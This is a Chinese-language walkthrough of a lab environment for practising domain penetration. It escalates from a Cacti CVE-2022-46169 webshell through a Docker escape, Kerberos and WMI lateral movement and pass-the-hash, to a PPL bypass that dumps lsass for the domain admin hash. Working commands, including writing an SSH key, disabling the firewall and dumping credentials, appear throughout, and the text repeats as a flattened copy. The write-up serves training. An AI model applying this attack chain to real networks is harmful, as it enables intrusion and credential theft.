域渗透-How2MoveLaterally靶场实战

字数 1459 2025-08-10 20:35:57

域渗透实战：How2MoveLaterally靶场教学文档

1. 靶场概述

本靶场环境是xbitsplatform靶场平台的基础环境之一，主要考察横向移动的知识点。从Linux外围打点开始，经历几次横向移动后最后获得域管权限。

主要知识点

CVE-2022-46169漏洞利用
SUID提权技术
Docker特权模式逃逸
域内Linux信息搜集
Linux横向移动技术
域内低权限定位个人机
本地账户横向移动
WMI端口受限绕过
内存保护PPL绕过

2. 初始打点

2.1 CVE-2022-46169漏洞利用

扫描发现Cacti版本为1.2.22，存在CVE-2022-46169漏洞
成功利用漏洞写入webshell
确认目标未开启disable_function和gpc，可直接执行命令

2.2 环境确认

发现存在/dockerenv文件，确认是Docker环境
初步信息搜集未发现其他可利用点

3. Docker逃逸

3.1 特权模式检测

检查/dev目录发现大量设备文件，表明Docker以特权模式启动
尝试挂载物理机磁盘但权限不足

3.2 SUID提权

查找SUID文件：

find / -user root -perm -4000 -exec ls -ldb {} \;

发现可利用的find命令

使用GTFOBins方法提权：

find . -exec /bin/sh -p -c whoami \; -quit

3.3 物理机磁盘访问

发现/mnt/cacti目录已挂载物理机磁盘

通过写入SSH公钥获取物理机访问权限：

find . -exec /bin/sh -p -c 'echo [base64编码的公钥] | base64 -d > /mnt/cacti/root/.ssh/authorized_keys' \; -quit

使用私钥成功登录物理机

4. 域信息搜集

4.1 基础信息收集

检查DNS配置，确认存在域环境，域控IP为10.0.2.100
通过TTL值(128)确认域控为Windows系统
查看LDAP配置，确认域名为move.lab

4.2 域账户发现

发现域账户linux_ldap可登录当前Linux
在/tmp目录发现linux_ldap用户缓存的Kerberos票据

4.3 机器账户利用

从krb5.keytab获取机器hash：
```
7eb5e976f35341c3a9aa667a7a701ec0
```

使用机器账户身份查询LDAP信息：

./GetADUsers_linux_x86_64 move.lab/cacti\$ -hashes 7eb5e976f35341c3a9aa667a7a701ec0:7eb5e976f35341c3a9aa667a7a701ec0 -all

5. 横向移动

5.1 定位目标机器

分析linux_ldap用户信息，发现属于"IT admins"组
使用API枚举机器本地管理员组成员：
```
./NetLocalGroupGetMembers server01.move.lab
```
确认"IT admins"是server01(10.0.2.199)的本地管理员组成员

5.2 WMI横向移动

使用Kerberos票据进行WMI横向：

export KRB5CCNAME=/tmp/krb5cc_1680801105
./wmiexec_linux_x86_64 move.lab/linux_ldap@connect.move.lab -k -no-pass -dc-ip 10.0.2.100

成功获取server01权限

5.3 获取本地凭据

抓取注册表获取本地管理员hash：
```
83cb8d375287916f79bbf0d29accc893
```
尝试使用本地管理员账户横向移动至server02

5.4 WMI端口受限绕过

发现server02仅开放135端口，常规WMI无法使用
使用sharpwmi工具通过RPC协议操作注册表：
```
sharpwmi.exe pth 10.0.2.105 cmd "whoami"
```

6. 绕过PPL保护

6.1 检测PPL保护

检查注册表确认开启PPL保护：

HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL

6.2 使用RIPPL工具绕过

上传RIPPL工具：

sharpwmi.exe pth 10.0.2.105 upload RIPPL.exe c:\windows\temp\RIPPL.exe

转储lsass进程内存：

sharpwmi.exe pth 10.0.2.105 cmd "c:\windows\temp\RIPPL.exe -D -f lsass.exe c:\windows\temp\lsass.dmp"

关闭防火墙获取dump文件：

sharpwmi.exe pth 10.0.2.105 cmd "netsh advfirewall set domainprofile state off"
copy /z \\10.0.2.105\c$\windows\temp\lsass.dmp

6.3 解析内存文件

使用mimikatz解析lsass.dmp：

Administrator b9f21293575140357afceead26c3397b

使用PTH技术获取最终flag

7. 总结

本靶场完整演示了从Web打点到最终获取域控权限的全过程，涉及多个关键知识点：

Web应用漏洞利用(CVE-2022-46169)
Docker特权逃逸与SUID提权
域内信息搜集与定位
多种横向移动技术(WMI、RPC等)
受限环境下的技术绕过(PPL保护、端口限制)
凭证获取与利用技术

每个环节都展示了在真实环境中可能遇到的限制和相应的绕过方法，是学习域渗透技术的优秀案例。

域渗透实战：How2MoveLaterally靶场教学文档 1. 靶场概述本靶场环境是xbitsplatform靶场平台的基础环境之一，主要考察横向移动的知识点。从Linux外围打点开始，经历几次横向移动后最后获得域管权限。主要知识点 CVE-2022-46169漏洞利用 SUID提权技术 Docker特权模式逃逸域内Linux信息搜集 Linux横向移动技术域内低权限定位个人机本地账户横向移动 WMI端口受限绕过内存保护PPL绕过 2. 初始打点 2.1 CVE-2022-46169漏洞利用扫描发现Cacti版本为1.2.22，存在CVE-2022-46169漏洞成功利用漏洞写入webshell 确认目标未开启disable_ function和gpc，可直接执行命令 2.2 环境确认发现存在 /dockerenv 文件，确认是Docker环境初步信息搜集未发现其他可利用点 3. Docker逃逸 3.1 特权模式检测检查 /dev 目录发现大量设备文件，表明Docker以特权模式启动尝试挂载物理机磁盘但权限不足 3.2 SUID提权查找SUID文件：发现可利用的 find 命令使用GTFOBins方法提权： 3.3 物理机磁盘访问发现 /mnt/cacti 目录已挂载物理机磁盘通过写入SSH公钥获取物理机访问权限：使用私钥成功登录物理机 4. 域信息搜集 4.1 基础信息收集检查DNS配置，确认存在域环境，域控IP为10.0.2.100 通过TTL值(128)确认域控为Windows系统查看LDAP配置，确认域名为 move.lab 4.2 域账户发现发现域账户 linux_ldap 可登录当前Linux 在 /tmp 目录发现 linux_ldap 用户缓存的Kerberos票据 4.3 机器账户利用从 krb5.keytab 获取机器hash：使用机器账户身份查询LDAP信息： 5. 横向移动 5.1 定位目标机器分析 linux_ldap 用户信息，发现属于"IT admins"组使用API枚举机器本地管理员组成员：确认"IT admins"是server01(10.0.2.199)的本地管理员组成员 5.2 WMI横向移动使用Kerberos票据进行WMI横向：成功获取server01权限 5.3 获取本地凭据抓取注册表获取本地管理员hash：尝试使用本地管理员账户横向移动至server02 5.4 WMI端口受限绕过发现server02仅开放135端口，常规WMI无法使用使用sharpwmi工具通过RPC协议操作注册表： 6. 绕过PPL保护 6.1 检测PPL保护检查注册表确认开启PPL保护： 6.2 使用RIPPL工具绕过上传RIPPL工具：转储lsass进程内存：关闭防火墙获取dump文件： 6.3 解析内存文件使用mimikatz解析lsass.dmp：使用PTH技术获取最终flag 7. 总结本靶场完整演示了从Web打点到最终获取域控权限的全过程，涉及多个关键知识点： Web应用漏洞利用(CVE-2022-46169) Docker特权逃逸与SUID提权域内信息搜集与定位多种横向移动技术(WMI、RPC等) 受限环境下的技术绕过(PPL保护、端口限制) 凭证获取与利用技术每个环节都展示了在真实环境中可能遇到的限制和相应的绕过方法，是学习域渗透技术的优秀案例。